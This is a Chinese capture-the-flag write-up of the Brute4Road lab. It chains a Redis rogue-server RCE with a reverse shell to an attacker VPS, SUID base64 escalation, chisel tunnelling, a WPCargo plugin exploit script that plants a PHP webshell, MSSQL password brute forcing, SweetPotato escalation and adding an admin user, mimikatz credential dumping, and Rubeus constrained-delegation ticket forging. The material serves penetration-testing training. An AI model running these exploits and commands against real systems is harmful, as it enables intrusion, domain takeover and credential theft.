［春秋云镜］ Brute4Road 仿真场景

靶标介绍：

Brute4Road是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

考点:

• redis主从复制rce
• base64命令提权
• sweetpotato提权
• 约束性委派

知识点

约束性委派攻击

委派：指将域内用户的权限委派给服务账户，使得服务账户能以用户权限访问域内的其他服务。

服务账号：域内用户的一种类型，是服务器运行服务时所用的账号，将服务运行起来并加入域内时所用的账户

S4U：Services for User，是一种Kerberos扩展，允许服务在没有用户凭据的情况下为用户请求票据。(默认支持)

进行约束委派攻击的前提

1. 要拿到服务账户的NTLM哈希

2. 服务账户配置了到域控制器上的特定服务(如CIFS) 进行约束委派

约束委派使得该服务账户能够代表其他账户(如Administrator) 请求访问该服务的票据

3. 域环境中启用了S4U扩展

攻击流程

工具地址: GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.

1. 申请TGT： 使用Rubeus工具为MSSQLSERVER$账户申请TGT

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:1d35efe0f482e03887accf3f2ec11f3b /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

/user:MSSQLSERVER$：指定用户为MSSQLSERVER$

/rc4:78aa7721aeb225c7495de5a172e0e238：使用NTLM哈希（RC4密钥）进行身份验证

/domain:xiaorang.lab：指定域

/dc:DC.xiaorang.lab：指定域控制器。

/nowrap：输出票据时不换行, 便于后续的利用

2. 使用S4U申请服务票据：利用S4U扩展，伪装成Administrator用户，申请访问域控（DC.xiaorang.lab）的CIFS服务的票据

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE0ixdpivzGZEwaeteoc1vI5Am8phJI3XGAILiddSV6o7d4FshbXGxyjNkrlmBIf2DPyh/2Fy4oQQlPZLuIIAbEFa4soPA8MDKVufpCvB7T1odaTiDqql9h3g3qD8/KvuTcR+eE/EfgXhbXsH9kaE+f1QpL7kXaX38MX7Iu9Bnz4x6/YmL/YrHZDDrKOoLszWqu8dFpaFHRnZbujX71EoPnM9cJB12s6A1/CwWHM8y9TkCoRP4jKyixDOzjlefdXffXAWbYNfYz+ABYHFtuZb6DQogcIVpFA//D5moDzc1/sd5FSQQkbUvN2OAjRIdtCOmsD3Txf5A4RwoDRBHVs7jULIgDADC3zZBZ61X2ziee3KJK0RdG1ZFlhCC/vP8VwpBEe33pfepBbNsWt2mYbVyt1fk0IDMJxx7bdSfVmNi+HpSnKzfxyEzW6RZBRLbN9ULO+I5m3P5RQ9tVU6ovTrF7h0rzHkFaoNI3O3k7NDyrgXGI90VplH6qpKt50PAOb8o1iUacZxtiJ9ct85+r3pIj2mBiijuoZx1tAuZGcpbCvC6r4jXnFnSCTCLkVuDVSWeFF1ZV5Iz8VBHKx1DMBv8pwNjAWgHAxCmon7+TFT+Ocm4c64C9a8rOz/AWEjS1N5T7mQe6dXbS5EukKJuTfu+8vcapIumw/BzdBIfdYMGBOFUeaDVhpnxDU8xMcN6fzetxk0QF9avaUxZy4g2dT7dIyTGkjYAxe1uGHz6p++Q/n06dFat368FSisOhOUHsnngsVL6o/mLD4SYYeNwmLvh9FqHosZyAFCHJJmwbuUBu/J08JciWJY2E9UZs2Qu/fw5fAWlLE4Sn+3eZK1oe6KV9diWis7mWZU+mvTUGmPgc+7xh+B595z1wDHNDnvaRxpyAMHZUPpIvBOAcVjC6w7+DchzBNUrWOy75BjWTYp+Lj5xObWCODXNTK4k6V/4utxKy/jwn/UJ9c19rAQ7EaOcNi8ET+hI+p4zliuerGJBOLvJ37VichZIhUZkrmKU8QxGVD77Oo9p1XYK055DVVyeIcQydHxfpzXl5v7mqX/D7eg5wXsckZXIMGkeCJdq6+KhG7FwcJjiibF2Fk8rdN0uQxGGC3zyV+Y9BhExFk5JtTo0q2CXS07trGWJZnFnDxW/vJ1AvvyK6bmNxgayWW4a8M3C859EOm2wjoiuAvwxK0196t17WiaTCsDEBROjD/J3+fmDvo9xm8MQY7akZkD6nxlqU0IHg9Yj7++QhPXWCcDOxkEq4Ecyq8IlI1ZE2i7OS7oMxIYVsjREECZisCkcDf9SXsHmz32CoZJu6QRBtRoqcf7mxcxeKN8hexQlg8bs7jDw8GJPbJmgkh1YG6nsIqq7FZCzTsRqm5u3lFDr8qkRfk4XTs6zb80/yU5+s7KpT9POV6ypuKYQz+3jr3qrH3dNnuGK3Lky7jsXbCxqwkq2gt706tbIYgE/SIZQ6jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBC6z5mJu20XTLwP0CfurmQMoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDUwODE0NDEwOFqmERgPMjAyNTA1MDkwMDQxMDhapxEYDzIwMjUwNTE1MTQ0MTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

/impersonateuser:Administrator：伪装成Administrator用户（域管理员，具有高权限）

/msdsspn:CIFS/DC.xiaorang.lab：目标服务为域控的CIFS服务。

CIFS是文件共享协议，控制它就能访问域控的文件系统, 访问敏感文件, 植入后门等

/dc:DC.xiaorang.lab：指定域控制器

/ptt：将获取的票据注入到当前会话中 ( Pass-the-Ticket )

/ticket:...：使用之前获取的TGT

外网

先用fscan扫描一下, 可以发现有redis的未授权访问

redis主从复制

参考文章: https://www.freebuf.com/articles/web/249238.html

利用工具: https://github.com/n0b0dyCN/redis-rogue-server

原理：

Redis如果当把数据存储在单个Redis的实例中，当读写体量比较大的时候，服务端就很难承受。为了应对这种情况，Redis就提供了主从模式，主从模式就是指使用一个redis实例作为主机，其他实例都作为备份机，其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式。

在两个Redis实例设置主从模式的时候，Redis的主机实例可以通过FULLRESYNC同步文件到从机上，然后在从机上加载so文件，我们就可以执行拓展的新命令了。

条件：

Redis 版本(4.x~5.0.5)（新增模块功能，可以通过C语言并编译出恶意.so文件）

redis弱密码或者无密码

root启动redis

fscan扫描出来的信息可以看到redis的版本是5.0.x, 而且可以未授权访问
打redis的主从复制, 在自己的 vps上面运行

python3 redis-rogue-server.py --rhost 39.98.123.25 --lhost 8.154.17.163

rhost --> 题目ip
lhost –> vps

这里要确保自己vps防火墙要打开21000端口, 之前以为安全组放开了所有端口就行, 但是脚本一直没有运行成功, 后面把防火墙端口打开才成功

后续输入r表示进行反弹shell, 然后输入自己vps的ip, 端口

base64提权

为方便查看, 进入python的交互式

python -c 'import pty; pty.spawn("/bin/bash")'

没有权限读取flag, 需要提权

尝试suid提权

find / -user root -perm -4000 -print 2>/dev/null

可以找到一个base64提权 (https://gtfobins.github.io/gtfobins/base64/)

用法: base64 "文件" | base64 --decode

base64 "flag01" | base64 --decode

内网

vps开启一个http服务, 用于在题目靶机上下载一些需要的工具文件

python3 -m http.server 8080 --directory /path/to/files

下载fscan, chisel等

wget http://ip:8080/fscan
wget http://ip:8080/chisel

ifconfig无法查看ip, 使用netstat -ano查看网络服务可以看到靶机内网ip, 用于扫描

./fscan -h 172.22.2.7/24 -o 1.txt

根据扫描结果: 存活5个主机

172.22.2.3		 域控主机
172.22.2.7		 存在CentOs服务
172.22.2.18	 	 存在WordPress站点, 存在smb弱口令
172.22.2.16		 域内主机,MSSQLSERVER服务, 存在smb弱口令
172.22.2.34		 

尝试了一下smb弱口令登录
要么权限不足无法查看 (c$) , 要么可以查看但是却没有用的信息

权限也不够, 也没法执行命令

proxychains4 crackmapexec smb 172.22.2.16 -u admin -p 123456 -d xiaorang.lab -x "whoami"

还是看看wordpress的站点, 找找有没有漏洞

先搭建代理

搭建代理

使用chisel搭建代理
服务端(vps)

./chisel server -p 8888 --reverse

客户端

./chisel client [vps]:8888 R:0.0.0.0:9383:socks

火狐浏览器设置里面连socks5的代理可以成功看到内网的站点

wpcargo插件漏洞

扫描一下wordpress的站点, 查看是否有漏洞

proxychains4 wpscan --url http://172.22.2.18 

可以发现一个插件 wpcargo可能存在漏洞

网上有 poc (https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a/ )

直接利用脚本打

import sys
import binascii
import requests# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'def encode_character_code(c: int):return '{:08b}'.format(c).replace('0', 'x')text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]destination_url = 'http://172.22.2.18/'
cmd = 'ls'# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.requests.get(f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)# We have uploaded a webshell - now let's use it to execute a command.print(requests.post(f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))

访问相应路由可以发现shell已经写入进去了, 用蚁剑连接

蚁剑连之前也要先进行socks代理

没有找到flag, 但是有一个配置文件, 里面有数据库的用户名和密码

直接用蚁剑连接数据库,

数据库里面可以直接找到flag

并且数据库里面还可以找到一些密码, 估计就是提醒你进行弱口令爆破

mssql弱口令

前面fscan搜集的一些信息可知, 172.22.2.16主机是存在mssql服务的, 并且开放了1433端口

那么把数据导出来, 爆破一下密码

fscan -h 172.22.2.16 -m mssql -pwdf 1.txt

sa / ElGNkOiC , sa是默认用户

然后MDUT连上去

此时已经是通过工具proxifier, 将自己的主机进行了socks5的代理, 才可以用MDUT连接上172.22.2.16的内网主机

权限不足无法查看flag, 需要提权, 这里之前也做过类似的, 也很容易想到上传SweetPotato进行提权

先激活组件, 然后就可以上传文件了

SweetPotato提权

命令格式: 
SweetPotato.exe -a "cmd"

可以发现已经是system的权限

windows查看网络连接 netstat -ano
可以发现3389端口是打开的, 可以进行远程连接

远程桌面连接

既然打开了3389端口, 并且现在提权到了管理员权限, 那么就可以尝试添加新用户, 并将其加入到管理组
用新添加的用户进行远程桌面连接

C:/Users/Public/sweetpotato.exe -a "net user xpw 123Xpw! /add"
C:/Users/Public/sweetpotato.exe -a "net localgroup administrators xpw /add"

密码不能太弱了, 要不然可能会无法添加成功

添加成功新用户后, 直接windows的远程桌面连接就行(windows已经是进行了全局代理的)

新添加的用户也是被添加进管理组的, 所以也是有权限可以读取flag的

mimikatz抓取hash

因为是在windows上面进行的远程连接, 好像默认是可以直接共享C盘下的文件, 所以我直接把mimikatz.exe放到我的C盘下, 远程桌面也就可以直接接收到这个文件, 可以执行用来抓取用户hash

常用组合: 
privilege::debug
sekurlsa::logonpasswords

privilege::debug

尝试将当前 Mimikatz 进程提升为“调试权限”（SeDebugPrivilege），这样它就可以访问其他高权限进程的内存，尤其是 LSASS（Local Security Authority Subsystem Service）进程。

• 如果没有这个权限，就无法读取包含密码和票据信息的 LSASS 内存。
• 正常用户没有该权限，只有 管理员（或 SYSTEM）权限的进程才能成功执行。

sekurlsa::logonpasswords

从内存中（通常是 lsass.exe）提取当前或已登录用户的：明文密码（如果可用）,哈希（NTLM）,
Kerberos 票据（TGT、TGS）, 凭据缓存（Cached Credentials）, 远程桌面/网络登录凭据等

拿到服务账户 MSSQLSERVER$的NTLM

1d35efe0f482e03887accf3f2ec11f3b

约束性委派攻击

可以使用bloodhound工具对域内信息进行搜集

MSSQLSERVER 配置了到 DC LDAP 和 CIFS 服务的约束性委派，可以用Rubeus申请自身的服务票据，然后再通过 S4U 协议伪造高权限 ST 拿下域控

.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:1d35efe0f482e03887accf3f2ec11f3b /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE0ixdpivzGZEwaeteoc1vI5Am8phJI3XGAILiddSV6o7d4FshbXGxyjNkrlmBIf2DPyh/2Fy4oQQlPZLuIIAbEFa4soPA8MDKVufpCvB7T1odaTiDqql9h3g3qD8/KvuTcR+eE/EfgXhbXsH9kaE+f1QpL7kXaX38MX7Iu9Bnz4x6/YmL/YrHZDDrKOoLszWqu8dFpaFHRnZbujX71EoPnM9cJB12s6A1/CwWHM8y9TkCoRP4jKyixDOzjlefdXffXAWbYNfYz+ABYHFtuZb6DQogcIVpFA//D5moDzc1/sd5FSQQkbUvN2OAjRIdtCOmsD3Txf5A4RwoDRBHVs7jULIgDADC3zZBZ61X2ziee3KJK0RdG1ZFlhCC/vP8VwpBEe33pfepBbNsWt2mYbVyt1fk0IDMJxx7bdSfVmNi+HpSnKzfxyEzW6RZBRLbN9ULO+I5m3P5RQ9tVU6ovTrF7h0rzHkFaoNI3O3k7NDyrgXGI90VplH6qpKt50PAOb8o1iUacZxtiJ9ct85+r3pIj2mBiijuoZx1tAuZGcpbCvC6r4jXnFnSCTCLkVuDVSWeFF1ZV5Iz8VBHKx1DMBv8pwNjAWgHAxCmon7+TFT+Ocm4c64C9a8rOz/AWEjS1N5T7mQe6dXbS5EukKJuTfu+8vcapIumw/BzdBIfdYMGBOFUeaDVhpnxDU8xMcN6fzetxk0QF9avaUxZy4g2dT7dIyTGkjYAxe1uGHz6p++Q/n06dFat368FSisOhOUHsnngsVL6o/mLD4SYYeNwmLvh9FqHosZyAFCHJJmwbuUBu/J08JciWJY2E9UZs2Qu/fw5fAWlLE4Sn+3eZK1oe6KV9diWis7mWZU+mvTUGmPgc+7xh+B595z1wDHNDnvaRxpyAMHZUPpIvBOAcVjC6w7+DchzBNUrWOy75BjWTYp+Lj5xObWCODXNTK4k6V/4utxKy/jwn/UJ9c19rAQ7EaOcNi8ET+hI+p4zliuerGJBOLvJ37VichZIhUZkrmKU8QxGVD77Oo9p1XYK055DVVyeIcQydHxfpzXl5v7mqX/D7eg5wXsckZXIMGkeCJdq6+KhG7FwcJjiibF2Fk8rdN0uQxGGC3zyV+Y9BhExFk5JtTo0q2CXS07trGWJZnFnDxW/vJ1AvvyK6bmNxgayWW4a8M3C859EOm2wjoiuAvwxK0196t17WiaTCsDEBROjD/J3+fmDvo9xm8MQY7akZkD6nxlqU0IHg9Yj7++QhPXWCcDOxkEq4Ecyq8IlI1ZE2i7OS7oMxIYVsjREECZisCkcDf9SXsHmz32CoZJu6QRBtRoqcf7mxcxeKN8hexQlg8bs7jDw8GJPbJmgkh1YG6nsIqq7FZCzTsRqm5u3lFDr8qkRfk4XTs6zb80/yU5+s7KpT9POV6ypuKYQz+3jr3qrH3dNnuGK3Lky7jsXbCxqwkq2gt706tbIYgE/SIZQ6jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBC6z5mJu20XTLwP0CfurmQMoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDUwODE0NDEwOFqmERgPMjAyNTA1MDkwMDQxMDhapxEYDzIwMjUwNTE1MTQ0MTA4WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

现在就拿到域控了, 直接执行命令拿flag

type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt

参考文章

https://fushuling.com/index.php/2023/09/03/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7brute4road/
https://www.cnblogs.com/fdxsec/p/17893308.html
https://blog.csdn.net/Jayjay___/article/details/141405315